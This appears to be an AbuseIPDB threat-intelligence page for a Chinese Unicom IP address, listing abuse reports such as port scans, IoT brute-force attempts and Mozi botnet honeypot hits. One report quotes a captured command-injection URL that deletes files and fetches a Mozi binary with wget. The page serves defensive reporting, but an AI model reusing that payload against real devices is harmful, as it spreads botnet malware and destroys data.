JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 120.85.115.99

120.85.115.99 was found in our database!

This IP was reported 193 times. Confidence of Abuse is 23%: ?

23%

ISP	United-Communications-Network-Technology-Co-Ltd, GuangZhou
Usage Type	Fixed Line ISP
ASN	AS17622
Domain Name	chinaunicom.cn
Country	🇨🇳 China
City	Guangzhou, Guangdong

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 120.85.115.99

Whois 120.85.115.99

IP Abuse Reports for 120.85.115.99:

This IP address has been reported a total of 193 times from 37 distinct sources. 120.85.115.99 was first reported on March 5th 2021, and the most recent report was 20 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇩🇪 pscriptos	2026-06-17 16:49:42 (20 hours ago)	This IP was detected by CrowdSec triggering crowdsecurity/netgear_rce	Web App Attack Hacking
🇧🇷 ICS Labs	2026-05-23 13:54:30 (3 weeks ago)	ICS Labs identified 120.85.115.99 as a malicious indicator from threat intelligence.	DDoS Attack Hacking Exploited Host
🇬🇧 PeravixGroup	2026-04-29 19:15:21 (1 month ago)	Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRI ... show more Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
Anonymous	2026-04-28 08:18:18 (1 month ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇬🇧 PeravixGroup	2026-04-27 02:12:48 (1 month ago)	Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: HI ... show more Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: HIGH. Aaran.cloud show less	IoT Targeted Brute-Force
🇫🇷 tavis.page	2026-04-25 08:58:37 (1 month ago)	Blocked by UFW on server [5555/tcp] Source port: 3866 TTL: 53 Packet length: 60 TOS: 0x00 This repo ... show more Blocked by UFW on server [5555/tcp] Source port: 3866 TTL: 53 Packet length: 60 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan IoT Targeted
🇺🇸 RAP	2026-04-24 23:38:55 (1 month ago)	2026-04-24 23:38:55 UTC Unauthorized activity to TCP port 8443. Web App	Port Scan Web App Attack
🇬🇧 PeravixGroup	2026-04-23 18:58:48 (1 month ago)	HoneyPot hit - Aaran.cloud \| Rce Attempt \| command injection \| GET /cgi-bin/;cd${IFS}/var/tmp;rm${IF ... show more HoneyPot hit - Aaran.cloud \| Rce Attempt \| command injection \| GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${I show less	Web App Attack
Anonymous	2026-01-12 17:10:36 (5 months ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2026-01-11 09:10:41 (5 months ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2025-12-02 12:19:29 (6 months ago)	Unauthorized connection attempt on Port 23	Port Scan Hacking Exploited Host
Anonymous	2025-12-02 05:18:09 (6 months ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇨🇳 ThreatBook.io	2025-08-18 23:56:43 (9 months ago)	ThreatBook Intelligence: Dynamic IP,Spam more details on https://threatbook.io/ip/120.85.115.99 2025 ... show more ThreatBook Intelligence: Dynamic IP,Spam more details on https://threatbook.io/ip/120.85.115.99 2025-08-18 13:35:05 /explore/projects?non_archived=true&page=2&sort=latest_activity_desc show less	Web App Attack
🇩🇪 ISPLtd	2024-10-17 05:52:13 (1 year ago)	Oct 17 02:52:09 SRC=120.85.115.99 PROTO=TCP SPT=1249 DPT=5555 SYN Oct 17 02:52:10 SRC=120.85.115.99 ... show more Oct 17 02:52:09 SRC=120.85.115.99 PROTO=TCP SPT=1249 DPT=5555 SYN Oct 17 02:52:10 SRC=120.85.115.99 PROTO=TCP SPT=1249 DPT=5555 SYN Oct 17 02:52:12 SRC=120.85.115.99 PROTO=TCP SPT=1249 DPT=5555 ... show less	Port Scan
🇩🇪 london2038.com	2024-09-28 04:28:28 (1 year ago)	Connection atttempts against closed TCP ports Sep 28 06:28:23 BLOCK SRC=120.85.115.99 LEN=60 TOS=0x0 ... show more Connection atttempts against closed TCP ports Sep 28 06:28:23 BLOCK SRC=120.85.115.99 LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=26553 DF PROTO=TCP SPT=12648 DPT=23 WINDOW=14520 RES=0x00 SYN Sep 28 06:28:24 BLOCK SRC=120.85.115.99 LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=26554 DF PROTO=TCP SPT=12648 DPT=23 WINDOW=14520 RES=0x00 SYN Sep 28 06:28:26 BLOCK SRC=120.85.115.99 LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=26555 DF PROTO=TCP SPT=12648 DPT=23 WINDOW=14520 RES=0x00 SYN show less	Port Scan

Showing 1 to 15 of 193 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇳🇱 212.92.104.249

🇨🇴 190.145.123.18

🇪🇸 185.188.61.216

🇺🇸 165.227.20.212

🇺🇸 162.216.150.231

🇷🇺 104.28.161.40

🇮🇳 103.157.129.51

🇺🇸 91.230.168.98

🇺🇸 66.132.224.29

🇷🇺 31.184.218.196

🇷🇴 2.57.122.238

🇺🇸 172.93.101.53

🇨🇳 124.226.216.189

🇺🇸 118.26.109.7

🇭🇰 47.238.228.149

🇳🇱 45.148.10.141

🇳🇱 45.142.193.131

🇺🇸 20.65.195.48

🇹🇷 5.11.168.173

🇺🇸 3.87.27.156